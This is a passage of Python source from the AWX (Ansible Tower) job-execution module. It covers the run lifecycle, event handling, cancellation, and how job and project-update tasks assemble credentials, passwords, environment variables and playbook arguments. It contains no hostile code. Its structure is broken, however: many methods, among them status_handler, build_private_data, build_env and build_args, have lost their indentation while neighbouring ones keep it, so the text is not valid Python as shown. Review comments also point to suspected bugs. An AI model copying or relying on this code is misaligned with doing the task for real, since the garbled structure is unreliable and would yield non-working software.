    return {prompt: (passwords.get(lookup_key, '') or '') for prompt, lookup_key in password_prompts.items()}
def pre_run_hook(self, instance, private_data_dir):
    """
    Hook for any steps to run before the job/task starts

    Base implementation only records the lifecycle event.
    """
    instance.log_lifecycle("pre_run")
def post_run_hook(self, instance, status):
    """
    Hook for any steps to run before job/task is marked as complete.

    Base implementation only records the lifecycle event.
    """
    instance.log_lifecycle("post_run")
def final_run_hook(self, instance, status, private_data_dir, fact_modification_times):
    """
    Hook for any steps to run after job/task is marked as complete.

    Copies playbook profiling artifacts to the host log directory and stores
    collections/ansible-version metadata from the runner artifacts on the
    job record.
    """
    instance.log_lifecycle("finalize_run")
    job_profiling_dir = os.path.join(private_data_dir, 'artifacts/playbook_profiling')
    awx_profiling_dir = '/var/log/tower/playbook_profiling/'
    collections_info = os.path.join(private_data_dir, 'artifacts/', 'collections.json')
    ansible_version_file = os.path.join(private_data_dir, 'artifacts/', 'ansible_version.txt')
    if not os.path.exists(awx_profiling_dir):
        os.mkdir(awx_profiling_dir)
    if os.path.isdir(job_profiling_dir):
        # Preserve per-playbook profiling data under the job's pk.
        shutil.copytree(job_profiling_dir, os.path.join(awx_profiling_dir, str(instance.pk)))
    if os.path.exists(collections_info):
        with open(collections_info) as ee_json_info:
            ee_collections_info = json.loads(ee_json_info.read())
            instance.installed_collections = ee_collections_info
            instance.save(update_fields=['installed_collections'])
    if os.path.exists(ansible_version_file):
        with open(ansible_version_file) as ee_ansible_info:
            ansible_version_info = ee_ansible_info.readline()
            instance.ansible_version = ansible_version_info
            instance.save(update_fields=['ansible_version'])
def event_handler(self, event_data):
    #
    # ⚠️ D-D-D-DANGER ZONE ⚠️
    # This method is called once for *every event* emitted by Ansible
    # Runner as a playbook runs. That means that changes to the code in
    # this method are _very_ likely to introduce performance regressions.
    #
    # Even if this function is made on average .05s slower, it can have
    # devastating performance implications for playbooks that emit
    # tens or hundreds of thousands of events.
    #
    # Proceed with caution!
    #
    """
    Ansible runner puts a parent_uuid on each event, no matter what the type.
    AWX only saves the parent_uuid if the event is for a Job.
    """
    # cache end_line locally for RunInventoryUpdate tasks
    # which generate job events from two 'streams':
    # ansible-inventory and the awx.main.commands.inventory_import
    # logger
    if isinstance(self, RunInventoryUpdate):
        self.end_line = event_data['end_line']

    if event_data.get(self.event_data_key, None):
        if self.event_data_key != 'job_id':
            event_data.pop('parent_uuid', None)
    if self.parent_workflow_job_id:
        event_data['workflow_job_id'] = self.parent_workflow_job_id
    if self.host_map:
        # Attach host_name/host_id so the event can be tied to a Host object.
        host = event_data.get('event_data', {}).get('host', '').strip()
        if host:
            event_data['host_name'] = host
            if host in self.host_map:
                event_data['host_id'] = self.host_map[host]
        else:
            event_data['host_name'] = ''
            event_data['host_id'] = ''
        if event_data.get('event') == 'playbook_on_stats':
            event_data['host_map'] = self.host_map

    if isinstance(self, RunProjectUpdate):
        # it's common for Ansible's SCM modules to print
        # error messages on failure that contain the plaintext
        # basic auth credentials (username + password)
        # it's also common for the nested event data itself (['res']['...'])
        # to contain unredacted text on failure
        # this is a _little_ expensive to filter
        # with regex, but project updates don't have many events,
        # so it *should* have a negligible performance impact
        task = event_data.get('event_data', {}).get('task_action')
        try:
            if task in ('git', 'svn'):
                event_data_json = json.dumps(event_data)
                event_data_json = UriCleaner.remove_sensitive(event_data_json)
                event_data = json.loads(event_data_json)
        except json.JSONDecodeError:
            pass

    if 'event_data' in event_data:
        event_data['event_data']['guid'] = self.guid

    event_data.setdefault(self.event_data_key, self.instance.id)
    self.dispatcher.dispatch(event_data)
    self.event_ct += 1

    '''
    Handle artifacts
    '''
    if event_data.get('event_data', {}).get('artifact_data', {}):
        self.instance.artifacts = event_data['event_data']['artifact_data']
        self.instance.save(update_fields=['artifacts'])

    return False
def cancel_callback(self):
    """
    Ansible runner callback to tell the job when/if it is canceled

    Returns True to cancel the run (either because the cancel flag/status is
    set, or because the job row disappeared from the database).
    """
    unified_job_id = self.instance.pk
    # Refresh from the DB so a cancel flag set by another process is seen.
    self.instance = self.update_model(unified_job_id)
    if not self.instance:
        logger.error('unified job {} was deleted while running, canceling'.format(unified_job_id))
        return True
    if self.instance.cancel_flag or self.instance.status == 'canceled':
        cancel_wait = (now() - self.instance.modified).seconds if self.instance.modified else 0
        if cancel_wait > 5:
            logger.warn('Request to cancel {} took {} seconds to complete.'.format(self.instance.log_format, cancel_wait))
        return True
    return False
def finished_callback(self, runner_obj):
    """
    Ansible runner callback triggered on finished run

    Emits a terminal EOF event carrying the total event count so consumers
    know the stream is complete.
    """
    event_data = {'event': 'EOF', 'final_counter': self.event_ct, 'guid': self.guid}
    event_data.setdefault(self.event_data_key, self.instance.id)
    self.dispatcher.dispatch(event_data)
def status_handler(self, status_data, runner_config):
"""
Ansible runner callback triggered on status transition
"""
if status_data['status'] == 'starting':
job_env = dict(runner_config.env)
'''
Take the safe environment variables and overwrite
'''
for k, v in self.safe_env.items():
if k in job_env:
job_env[k] = v
self.instance = self.update_model(self.instance.pk, job_args=json.dumps(runner_config.command), job_cwd=runner_config.cwd, job_env=job_env)
elif status_data['status'] == 'error':
result_traceback = status_data.get('result_traceback', None)
if result_traceback:
self.instance = self.update_model(self.instance.pk, result_traceback=result_traceback)
    @with_path_cleanup
    def run(self, pk, **kwargs):
        """
        Run the job/task and capture its output.

        Drives the full unified-job lifecycle: marks the job running, builds
        the private data dir / credentials / args / env, dispatches execution
        via ansible-runner (SystemJob) or receptor (all other job types),
        persists the final status, and fires the post/final run hooks.
        """
        self.instance = self.model.objects.get(pk=pk)
        # Resolve a default execution environment if none was assigned,
        # without generating activity-stream noise.
        if self.instance.execution_environment_id is None:
            from awx.main.signals import disable_activity_stream

            with disable_activity_stream():
                self.instance = self.update_model(self.instance.pk, execution_environment=self.instance.resolve_execution_environment())
        # self.instance because of the update_model pattern and when it's used in callback handlers
        self.instance = self.update_model(pk, status='running', start_args='')  # blank field to remove encrypted passwords
        self.instance.websocket_emit_status("running")
        status, rc = 'error', None
        extra_update_fields = {}
        fact_modification_times = {}
        self.event_ct = 0
        '''
        Needs to be an object property because status_handler uses it in a callback context
        '''
        self.safe_env = {}
        self.safe_cred_env = {}
        private_data_dir = None
        # store a reference to the parent workflow job (if any) so we can include
        # it in event data JSON
        if self.instance.spawned_by_workflow:
            self.parent_workflow_job_id = self.instance.get_workflow_job().id
        try:
            self.instance.send_notification_templates("running")
            private_data_dir = self.build_private_data_dir(self.instance)
            # pre_run_hook may run a project sync or otherwise fail/cancel the job
            self.pre_run_hook(self.instance, private_data_dir)
            self.instance.log_lifecycle("preparing_playbook")
            if self.instance.cancel_flag:
                self.instance = self.update_model(self.instance.pk, status='canceled')
            if self.instance.status != 'running':
                # Stop the task chain and prevent starting the job if it has
                # already been canceled.
                self.instance = self.update_model(pk)
                status = self.instance.status
                raise RuntimeError('not starting %s task' % self.instance.status)
            if not os.path.exists(settings.AWX_ISOLATION_BASE_PATH):
                raise RuntimeError('AWX_ISOLATION_BASE_PATH=%s does not exist' % settings.AWX_ISOLATION_BASE_PATH)
            # store a record of the venv used at runtime
            if hasattr(self.instance, 'custom_virtualenv'):
                self.update_model(pk, custom_virtualenv=getattr(self.instance, 'ansible_virtualenv_path', settings.ANSIBLE_VENV_PATH))
            # Fetch "cached" fact data from prior runs and put on the disk
            # where ansible expects to find it
            if getattr(self.instance, 'use_fact_cache', False):
                self.instance.start_job_fact_cache(
                    os.path.join(private_data_dir, 'artifacts', str(self.instance.id), 'fact_cache'),
                    fact_modification_times,
                )
            # May have to serialize the value
            private_data_files = self.build_private_data_files(self.instance, private_data_dir)
            passwords = self.build_passwords(self.instance, kwargs)
            self.build_extra_vars_file(self.instance, private_data_dir)
            args = self.build_args(self.instance, private_data_dir, passwords)
            env = self.build_env(self.instance, private_data_dir, private_data_files=private_data_files)
            # safe_env holds the redacted env used by status_handler when it
            # records job_env on the model
            self.safe_env = build_safe_env(env)
            credentials = self.build_credentials_list(self.instance)
            for credential in credentials:
                if credential:
                    credential.credential_type.inject_credential(credential, env, self.safe_cred_env, args, private_data_dir)
            self.safe_env.update(self.safe_cred_env)
            self.write_args_file(private_data_dir, args)
            password_prompts = self.get_password_prompts(passwords)
            expect_passwords = self.create_expect_passwords_data_struct(password_prompts, passwords)
            params = {
                'ident': self.instance.id,
                'private_data_dir': private_data_dir,
                'playbook': self.build_playbook_path_relative_to_cwd(self.instance, private_data_dir),
                'inventory': self.build_inventory(self.instance, private_data_dir),
                'passwords': expect_passwords,
                'envvars': env,
                'settings': {
                    'job_timeout': self.get_instance_timeout(self.instance),
                    'suppress_ansible_output': True,
                },
            }
            if isinstance(self.instance, AdHocCommand):
                params['module'] = self.build_module_name(self.instance)
                params['module_args'] = self.build_module_args(self.instance)
            if getattr(self.instance, 'use_fact_cache', False):
                # Enable Ansible fact cache.
                params['fact_cache_type'] = 'jsonfile'
            else:
                # Disable Ansible fact cache.
                params['fact_cache_type'] = ''
            if self.instance.is_container_group_task or settings.IS_K8S:
                params['envvars'].pop('HOME', None)
            '''
            Delete parameters if the values are None or empty array
            '''
            for v in ['passwords', 'playbook', 'inventory']:
                if not params[v]:
                    del params[v]
            self.dispatcher = CallbackQueueDispatcher()
            self.instance.log_lifecycle("running_playbook")
            if isinstance(self.instance, SystemJob):
                # System jobs run locally via ansible-runner
                res = ansible_runner.interface.run(
                    project_dir=settings.BASE_DIR,
                    event_handler=self.event_handler,
                    finished_callback=self.finished_callback,
                    status_handler=self.status_handler,
                    **params,
                )
            else:
                # Everything else is dispatched through receptor
                receptor_job = AWXReceptorJob(self, params)
                self.unit_id = receptor_job.unit_id
                res = receptor_job.run()

                if not res:
                    return

            status = res.status
            rc = res.rc

            if status == 'timeout':
                self.instance.job_explanation = "Job terminated due to timeout"
                status = 'failed'
                extra_update_fields['job_explanation'] = self.instance.job_explanation
                # ensure failure notification sends even if playbook_on_stats event is not triggered
                # NOTE(review): this references self.instance.job.id — confirm the
                # instance type here actually has a .job relation
                handle_success_and_failure_notifications.apply_async([self.instance.job.id])

        except InvalidVirtualenvError as e:
            extra_update_fields['job_explanation'] = e.message
            logger.error('{} {}'.format(self.instance.log_format, e.message))
        except Exception:
            # this could catch programming or file system errors
            extra_update_fields['result_traceback'] = traceback.format_exc()
            logger.exception('%s Exception occurred while running task', self.instance.log_format)
        finally:
            logger.debug('%s finished running, producing %s events.', self.instance.log_format, self.event_ct)

        try:
            self.post_run_hook(self.instance, status)
        except PostRunError as exc:
            # A post-run failure can downgrade an otherwise-successful job
            if status == 'successful':
                status = exc.status
                extra_update_fields['job_explanation'] = exc.args[0]
                if exc.tb:
                    extra_update_fields['result_traceback'] = exc.tb
        except Exception:
            logger.exception('{} Post run hook errored.'.format(self.instance.log_format))

        # Refresh, then persist final status and the total event count
        self.instance = self.update_model(pk)
        self.instance = self.update_model(pk, status=status, emitted_events=self.event_ct, **extra_update_fields)

        try:
            self.final_run_hook(self.instance, status, private_data_dir, fact_modification_times)
        except Exception:
            logger.exception('{} Final run hook errored.'.format(self.instance.log_format))

        self.instance.websocket_emit_status(status)
        if status != 'successful':
            # Raise so the dispatcher records the task itself as failed/canceled
            if status == 'canceled':
                raise AwxTaskError.TaskCancel(self.instance, rc)
            else:
                raise AwxTaskError.TaskError(self.instance, rc)
@task(queue=get_local_queuename)
class RunJob(BaseTask):
    """
    Run a job using ansible-playbook.
    """

    # Django model this task operates on
    model = Job
    # Event model used to store runner callback events for this job type
    event_model = JobEvent
    # Key under which the parent job's id is attached to each event payload
    event_data_key = 'job_id'
def build_private_data(self, job, private_data_dir):
"""
Returns a dict of the form
{
'credentials': {
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>,
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>,
...
},
'certificates': {
<awx.main.models.Credential>: <signed SSH certificate data>,
<awx.main.models.Credential>: <signed SSH certificate data>,
...
}
}
"""
private_data = {'credentials': {}}
for credential in job.credentials.prefetch_related('input_sources__source_credential').all():
# If we were sent SSH credentials, decrypt them and send them
# back (they will be written to a temporary file).
if credential.has_input('ssh_key_data'):
private_data['credentials'][credential] = credential.get_input('ssh_key_data', default='')
if credential.has_input('ssh_public_key_data'):
private_data.setdefault('certificates', {})[credential] = credential.get_input('ssh_public_key_data', default='')
return private_data
def build_passwords(self, job, runtime_passwords):
"""
Build a dictionary of passwords for SSH private key, SSH user, sudo/su
and ansible-vault.
"""
passwords = super(RunJob, self).build_passwords(job, runtime_passwords)
cred = job.machine_credential
if cred:
for field in ('ssh_key_unlock', 'ssh_password', 'become_password', 'vault_password'):
value = runtime_passwords.get(field, cred.get_input('password' if field == 'ssh_password' else field, default=''))
if value not in ('', 'ASK'):
passwords[field] = value
for cred in job.vault_credentials:
field = 'vault_password'
vault_id = cred.get_input('vault_id', default=None)
if vault_id:
field = 'vault_password.{}'.format(vault_id)
if field in passwords:
raise RuntimeError('multiple vault credentials were specified with --vault-id {}@prompt'.format(vault_id))
value = runtime_passwords.get(field, cred.get_input('vault_password', default=''))
if value not in ('', 'ASK'):
passwords[field] = value
'''
Only 1 value can be provided for a unique prompt string. Prefer ssh
key unlock over network key unlock.
'''
if 'ssh_key_unlock' not in passwords:
for cred in job.network_credentials:
if cred.inputs.get('ssh_key_unlock'):
passwords['ssh_key_unlock'] = runtime_passwords.get('ssh_key_unlock', cred.get_input('ssh_key_unlock', default=''))
break
return passwords
def build_env(self, job, private_data_dir, private_data_files=None):
"""
Build environment dictionary for ansible-playbook.
"""
env = super(RunJob, self).build_env(job, private_data_dir, private_data_files=private_data_files)
if private_data_files is None:
private_data_files = {}
# Set environment variables needed for inventory and job event
# callbacks to work.
env['JOB_ID'] = str(job.pk)
env['INVENTORY_ID'] = str(job.inventory.pk)
if job.project:
env['PROJECT_REVISION'] = job.project.scm_revision
env['ANSIBLE_RETRY_FILES_ENABLED'] = "False"
env['MAX_EVENT_RES'] = str(settings.MAX_EVENT_RES_DATA)
if hasattr(settings, 'AWX_ANSIBLE_CALLBACK_PLUGINS') and settings.AWX_ANSIBLE_CALLBACK_PLUGINS:
env['ANSIBLE_CALLBACK_PLUGINS'] = ':'.join(settings.AWX_ANSIBLE_CALLBACK_PLUGINS)
env['AWX_HOST'] = settings.TOWER_URL_BASE
# Create a directory for ControlPath sockets that is unique to each job
cp_dir = os.path.join(private_data_dir, 'cp')
if not os.path.exists(cp_dir):
os.mkdir(cp_dir, 0o700)
# FIXME: more elegant way to manage this path in container
env['ANSIBLE_SSH_CONTROL_PATH_DIR'] = '/runner/cp'
# Set environment variables for cloud credentials.
cred_files = private_data_files.get('credentials', {})
for cloud_cred in job.cloud_credentials:
if cloud_cred and cloud_cred.credential_type.namespace == 'openstack' and cred_files.get(cloud_cred, ''):
env['OS_CLIENT_CONFIG_FILE'] = to_container_path(cred_files.get(cloud_cred, ''), private_data_dir)
for network_cred in job.network_credentials:
env['ANSIBLE_NET_USERNAME'] = network_cred.get_input('username', default='')
env['ANSIBLE_NET_PASSWORD'] = network_cred.get_input('password', default='')
ssh_keyfile = cred_files.get(network_cred, '')
if ssh_keyfile:
env['ANSIBLE_NET_SSH_KEYFILE'] = ssh_keyfile
authorize = network_cred.get_input('authorize', default=False)
env['ANSIBLE_NET_AUTHORIZE'] = str(int(authorize))
if authorize:
env['ANSIBLE_NET_AUTH_PASS'] = network_cred.get_input('authorize_password', default='')
path_vars = (
('ANSIBLE_COLLECTIONS_PATHS', 'collections_paths', 'requirements_collections', '~/.ansible/collections:/usr/share/ansible/collections'),
('ANSIBLE_ROLES_PATH', 'roles_path', 'requirements_roles', '~/.ansible/roles:/usr/share/ansible/roles:/etc/ansible/roles'),
)
config_values = read_ansible_config(job.project.get_project_path(), list(map(lambda x: x[1], path_vars)))
for env_key, config_setting, folder, default in path_vars:
paths = default.split(':')
if env_key in env:
for path in env[env_key].split(':'):
if path not in paths:
paths = [env[env_key]] + paths
elif config_setting in config_values:
for path in config_values[config_setting].split(':'):
if path not in paths:
paths = [config_values[config_setting]] + paths
paths = [os.path.join(CONTAINER_ROOT, folder)] + paths
env[env_key] = os.pathsep.join(paths)
return env
def build_args(self, job, private_data_dir, passwords):
"""
Build command line argument list for running ansible-playbook,
optionally using ssh-agent for public/private key authentication.
"""
creds = job.machine_credential
ssh_username, become_username, become_method = '', '', ''
if creds:
ssh_username = creds.get_input('username', default='')
become_method = creds.get_input('become_method', default='')
become_username = creds.get_input('become_username', default='')
else:
become_method = None
become_username = ""
# Always specify the normal SSH user as root by default. Since this
# task is normally running in the background under a service account,
# it doesn't make sense to rely on ansible-playbook's default of using
# the current user.
ssh_username = ssh_username or 'root'
args = []
if job.job_type == 'check':
args.append('--check')
args.extend(['-u', sanitize_jinja(ssh_username)])
if 'ssh_password' in passwords:
args.append('--ask-pass')
if job.become_enabled:
args.append('--become')
if job.diff_mode:
args.append('--diff')
if become_method:
args.extend(['--become-method', sanitize_jinja(become_method)])
if become_username:
args.extend(['--become-user', sanitize_jinja(become_username)])
if 'become_password' in passwords:
args.append('--ask-become-pass')
# Support prompting for multiple vault passwords
for k, v in passwords.items():
if k.startswith('vault_password'):
if k == 'vault_password':
args.append('--ask-vault-pass')
else:
# split only on the first dot in case the vault ID itself contains a dot
vault_id = k.split('.', 1)[1]
args.append('--vault-id')
args.append('{}@prompt'.format(vault_id))
if job.forks:
if settings.MAX_FORKS > 0 and job.forks > settings.MAX_FORKS:
logger.warning(f'Maximum number of forks ({settings.MAX_FORKS}) exceeded.')
args.append('--forks=%d' % settings.MAX_FORKS)
else:
args.append('--forks=%d' % job.forks)
if job.force_handlers:
args.append('--force-handlers')
if job.limit:
args.extend(['-l', job.limit])
if job.verbosity:
args.append('-%s' % ('v' * min(5, job.verbosity)))
if job.job_tags:
args.extend(['-t', job.job_tags])
if job.skip_tags:
args.append('--skip-tags=%s' % job.skip_tags)
if job.start_at_task:
args.append('--start-at-task=%s' % job.start_at_task)
return args
    def build_playbook_path_relative_to_cwd(self, job, private_data_dir):
        # The job's playbook field is already a path relative to the
        # project root (the runner's cwd), so return it unchanged.
        return job.playbook
def build_extra_vars_file(self, job, private_data_dir):
# Define special extra_vars for AWX, combine with job.extra_vars.
extra_vars = job.awx_meta_vars()
if job.extra_vars_dict:
extra_vars.update(json.loads(job.decrypted_extra_vars()))
# By default, all extra vars disallow Jinja2 template usage for
# security reasons; top level key-values defined in JT.extra_vars, however,
# are allowed as "safe" (because they can only be set by users with
# higher levels of privilege - those that have the ability create and
# edit Job Templates)
safe_dict = {}
if job.job_template and settings.ALLOW_JINJA_IN_EXTRA_VARS == 'template':
safe_dict = job.job_template.extra_vars_dict
return self._write_extra_vars_file(private_data_dir, extra_vars, safe_dict)
    def build_credentials_list(self, job):
        # All credentials attached to the job, with input sources prefetched
        # so later get_input() calls don't each trigger extra queries.
        return job.credentials.prefetch_related('input_sources__source_credential').all()
def get_password_prompts(self, passwords={}):
d = super(RunJob, self).get_password_prompts(passwords)
d[r'Enter passphrase for .*:\s*?$'] = 'ssh_key_unlock'
d[r'Bad passphrase, try again for .*:\s*?$'] = ''
for method in PRIVILEGE_ESCALATION_METHODS:
d[r'%s password.*:\s*?$' % (method[0])] = 'become_password'
d[r'%s password.*:\s*?$' % (method[0].upper())] = 'become_password'
d[r'BECOME password.*:\s*?$'] = 'become_password'
d[r'SSH password:\s*?$'] = 'ssh_password'
d[r'Password:\s*?$'] = 'ssh_password'
d[r'Vault password:\s*?$'] = 'vault_password'
for k, v in passwords.items():
if k.startswith('vault_password.'):
# split only on the first dot in case the vault ID itself contains a dot
vault_id = k.split('.', 1)[1]
d[r'Vault password \({}\):\s*?$'.format(vault_id)] = k
return d
def build_execution_environment_params(self, instance, private_data_dir):
if settings.IS_K8S:
return {}
params = super(RunJob, self).build_execution_environment_params(instance, private_data_dir)
# If this has an insights agent and it is not already mounted then show it
insights_dir = os.path.dirname(settings.INSIGHTS_SYSTEM_ID_FILE)
if instance.use_fact_cache and os.path.exists(insights_dir):
logger.info('not parent of others')
params.setdefault('container_volume_mounts', [])
params['container_volume_mounts'].extend(
[
f"{insights_dir}:{insights_dir}:Z",
]
)
return params
    def pre_run_hook(self, job, private_data_dir):
        """
        Steps to run before the job starts.

        Validates that the job has an inventory, project, and execution
        environment; then decides whether a local project sync is required
        (fresh clone, revision mismatch, missing roles/collections cache, or
        branch override) and runs that sync inline before the job proper.
        """
        super(RunJob, self).pre_run_hook(job, private_data_dir)
        if job.inventory is None:
            error = _('Job could not start because it does not have a valid inventory.')
            self.update_model(job.pk, status='failed', job_explanation=error)
            raise RuntimeError(error)
        elif job.project is None:
            error = _('Job could not start because it does not have a valid project.')
            self.update_model(job.pk, status='failed', job_explanation=error)
            raise RuntimeError(error)
        elif job.execution_environment is None:
            error = _('Job could not start because no Execution Environment could be found.')
            self.update_model(job.pk, status='error', job_explanation=error)
            raise RuntimeError(error)
        elif job.project.status in ('error', 'failed'):
            msg = _('The project revision for this job template is unknown due to a failed update.')
            job = self.update_model(job.pk, status='failed', job_explanation=msg)
            raise RuntimeError(msg)

        project_path = job.project.get_project_path(check_if_exists=False)
        job_revision = job.project.scm_revision
        sync_needs = []
        source_update_tag = 'update_{}'.format(job.project.scm_type)
        # A branch override means this job runs a branch other than the
        # project default, so the local checkout can't be reused as-is.
        branch_override = bool(job.scm_branch and job.scm_branch != job.project.scm_branch)
        if not job.project.scm_type:
            pass  # manual projects are not synced, user has responsibility for that
        elif not os.path.exists(project_path):
            logger.debug('Performing fresh clone of {} on this instance.'.format(job.project))
            sync_needs.append(source_update_tag)
        elif job.project.scm_type == 'git' and job.project.scm_revision and (not branch_override):
            # Fast path: skip the sync entirely if the wanted commit is
            # already checked out locally.
            try:
                git_repo = git.Repo(project_path)
                if job_revision == git_repo.head.commit.hexsha:
                    logger.debug('Skipping project sync for {} because commit is locally available'.format(job.log_format))
                else:
                    sync_needs.append(source_update_tag)
            except (ValueError, BadGitName, git.exc.InvalidGitRepositoryError):
                logger.debug('Needed commit for {} not in local source tree, will sync with remote'.format(job.log_format))
                sync_needs.append(source_update_tag)
        else:
            logger.debug('Project not available locally, {} will sync with remote'.format(job.log_format))
            sync_needs.append(source_update_tag)

        has_cache = os.path.exists(os.path.join(job.project.get_cache_path(), job.project.cache_id))
        # Galaxy requirements are not supported for manual projects
        if job.project.scm_type and ((not has_cache) or branch_override):
            sync_needs.extend(['install_roles', 'install_collections'])

        if sync_needs:
            pu_ig = job.instance_group
            pu_en = job.execution_node

            sync_metafields = dict(
                launch_type="sync",
                job_type='run',
                job_tags=','.join(sync_needs),
                status='running',
                instance_group=pu_ig,
                execution_node=pu_en,
                celery_task_id=job.celery_task_id,
            )
            if branch_override:
                sync_metafields['scm_branch'] = job.scm_branch
                sync_metafields['scm_clean'] = True  # to accommodate force pushes
            if 'update_' not in sync_metafields['job_tags']:
                # roles/collections-only sync: keep the pinned revision
                sync_metafields['scm_revision'] = job_revision
            local_project_sync = job.project.create_project_update(_eager_fields=sync_metafields)
            # save the associated job before calling run() so that a
            # cancel() call on the job can cancel the project update
            job = self.update_model(job.pk, project_update=local_project_sync)

            project_update_task = local_project_sync._get_task_class()
            try:
                # the job private_data_dir is passed so sync can download roles and collections there
                sync_task = project_update_task(job_private_data_dir=private_data_dir)
                sync_task.run(local_project_sync.id)
                local_project_sync.refresh_from_db()
                job = self.update_model(job.pk, scm_revision=local_project_sync.scm_revision)
            except Exception:
                local_project_sync.refresh_from_db()
                # A canceled sync is handled via job.cancel_flag below instead
                # of failing the job here.
                if local_project_sync.status != 'canceled':
                    job = self.update_model(
                        job.pk,
                        status='failed',
                        job_explanation=(
                            'Previous Task Failed: {"job_type": "%s", "job_name": "%s", "job_id": "%s"}'
                            % ('project_update', local_project_sync.name, local_project_sync.id)
                        ),
                    )
                    raise
            job.refresh_from_db()
            if job.cancel_flag:
                return
        else:
            # Case where a local sync is not needed, meaning that local tree is
            # up-to-date with project, job is running project current version
            if job_revision:
                job = self.update_model(job.pk, scm_revision=job_revision)
            # Project update does not copy the folder, so copy here
            RunProjectUpdate.make_local_copy(job.project, private_data_dir, scm_revision=job_revision)

        if job.inventory.kind == 'smart':
            # cache smart inventory memberships so that the host_filter query is not
            # ran inside of the event saving code
            update_smart_memberships_for_inventory(job.inventory)
    def final_run_hook(self, job, status, private_data_dir, fact_modification_times):
        """
        Steps to run after the job has been marked complete.

        Harvests the on-disk fact cache back onto host records (when fact
        caching is enabled) and schedules recomputation of the inventory's
        computed fields.
        """
        super(RunJob, self).final_run_hook(job, status, private_data_dir, fact_modification_times)
        if not private_data_dir:
            # If there's no private data dir, that means we didn't get into the
            # actual `run()` call; this _usually_ means something failed in
            # the pre_run_hook method
            return
        if job.use_fact_cache:
            # NOTE(review): run() seeds the cache at artifacts/<job id>/fact_cache
            # but this reads artifacts/fact_cache — confirm which layout the
            # runner actually produces on completion.
            job.finish_job_fact_cache(
                os.path.join(private_data_dir, 'artifacts', 'fact_cache'),
                fact_modification_times,
            )
        try:
            inventory = job.inventory
        except Inventory.DoesNotExist:
            # Inventory may have been deleted while the job was running.
            pass
        else:
            if inventory is not None:
                update_inventory_computed_fields.delay(inventory.id)
@task(queue=get_local_queuename)
class RunProjectUpdate(BaseTask):
    """
    Run a project update (SCM clone/sync) via the project_update playbook.
    """

    # Django model this task operates on
    model = ProjectUpdate
    # Event model used to store runner callback events for project updates
    event_model = ProjectUpdateEvent
    # Key under which the project update's id is attached to each event payload
    event_data_key = 'project_update_id'
    def __init__(self, *args, job_private_data_dir=None, **kwargs):
        """
        :param job_private_data_dir: when this update runs as a dependency of
            a job, the job's private data dir (so roles/collections can be
            downloaded there).
        """
        super(RunProjectUpdate, self).__init__(*args, **kwargs)
        # Set by event_handler when the playbook reports the new SCM revision
        self.playbook_new_revision = None
        # NOTE(review): initialized but not used within this chunk —
        # presumably the branch to restore after an override; confirm.
        self.original_branch = None
        self.job_private_data_dir = job_private_data_dir
def event_handler(self, event_data):
super(RunProjectUpdate, self).event_handler(event_data)
returned_data = event_data.get('event_data', {})
if returned_data.get('task_action', '') == 'set_fact':
returned_facts = returned_data.get('res', {}).get('ansible_facts', {})
if 'scm_version' in returned_facts:
self.playbook_new_revision = returned_facts['scm_version']
def build_private_data(self, project_update, private_data_dir):
"""
Return SSH private key data needed for this project update.
Returns a dict of the form
{
'credentials': {
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>,
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>,
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>
}
}
"""
private_data = {'credentials': {}}
if project_update.credential:
credential = project_update.credential
if credential.has_input('ssh_key_data'):
private_data['credentials'][credential] = credential.get_input('ssh_key_data', default='')
return private_data
def build_passwords(self, project_update, runtime_passwords):
"""
Build a dictionary of passwords for SSH private key unlock and SCM
username/password.
"""
passwords = super(RunProjectUpdate, self).build_passwords(project_update, runtime_passwords)
if project_update.credential:
passwords['scm_key_unlock'] = project_update.credential.get_input('ssh_key_unlock', default='')
passwords['scm_username'] = project_update.credential.get_input('username', default='')
passwords['scm_password'] = project_update.credential.get_input('password', default='')
return passwords
def build_env(self, project_update, private_data_dir, private_data_files=None):
"""
Build environment dictionary for ansible-playbook.
"""
env = super(RunProjectUpdate, self).build_env(project_update, private_data_dir, private_data_files=private_data_files)
env['ANSIBLE_RETRY_FILES_ENABLED'] = str(False)
env['ANSIBLE_ASK_PASS'] = str(False)
env['ANSIBLE_BECOME_ASK_PASS'] = str(False)
env['DISPLAY'] = '' # Prevent stupid password popup when running tests.
# give ansible a hint about the intended tmpdir to work around issues
# like https://github.com/ansible/ansible/issues/30064
env['TMP'] = settings.AWX_ISOLATION_BASE_PATH
env['PROJECT_UPDATE_ID'] = str(project_update.pk)
if settings.GALAXY_IGNORE_CERTS:
env['ANSIBLE_GALAXY_IGNORE'] = True
# build out env vars for Galaxy credentials (in order)
galaxy_server_list = []
if project_update.project.organization:
for i, cred in enumerate(project_update.project.organization.galaxy_credentials.all()):
env[f'ANSIBLE_GALAXY_SERVER_SERVER{i}_URL'] = cred.get_input('url')
auth_url = cred.get_input('auth_url', default=None)
token = cred.get_input('token', default=None)
if token:
env[f'ANSIBLE_GALAXY_SERVER_SERVER{i}_TOKEN'] = token
if auth_url:
env[f'ANSIBLE_GALAXY_SERVER_SERVER{i}_AUTH_URL'] = auth_url
galaxy_server_list.append(f'server{i}')
if galaxy_server_list:
env['ANSIBLE_GALAXY_SERVER_LIST'] = ','.join(galaxy_server_list)
return env
    def _build_scm_url_extra_vars(self, project_update):
        """
        Helper method to build SCM url and extra vars with parameters needed
        for authentication.

        Returns a two-tuple ``(scm_url, extra_vars)``; depending on the SCM
        type and URL scheme, credentials are either embedded into the URL or
        exposed to the playbook via extra vars.
        """
        extra_vars = {}
        if project_update.credential:
            scm_username = project_update.credential.get_input('username', default='')
            scm_password = project_update.credential.get_input('password', default='')
        else:
            scm_username = ''
            scm_password = ''
        scm_type = project_update.scm_type
        scm_url = update_scm_url(scm_type, project_update.scm_url, check_special_cases=False)
        scm_url_parts = urlparse.urlsplit(scm_url)
        # Prefer the username/password in the URL, if provided.
        scm_username = scm_url_parts.username or scm_username
        scm_password = scm_url_parts.password or scm_password
        if scm_username:
            if scm_type == 'svn':
                # svn gets its credentials via extra vars; the False sentinel is
                # passed on to update_scm_url — presumably to keep the password
                # out of the rebuilt URL (confirm against update_scm_url).
                extra_vars['scm_username'] = scm_username
                extra_vars['scm_password'] = scm_password
                scm_password = False
                if scm_url_parts.scheme != 'svn+ssh':
                    scm_username = False
            elif scm_url_parts.scheme.endswith('ssh'):
                # ssh schemes authenticate with keys; never embed a password
                scm_password = False
            elif scm_type in ('insights', 'archive'):
                extra_vars['scm_username'] = scm_username
                extra_vars['scm_password'] = scm_password
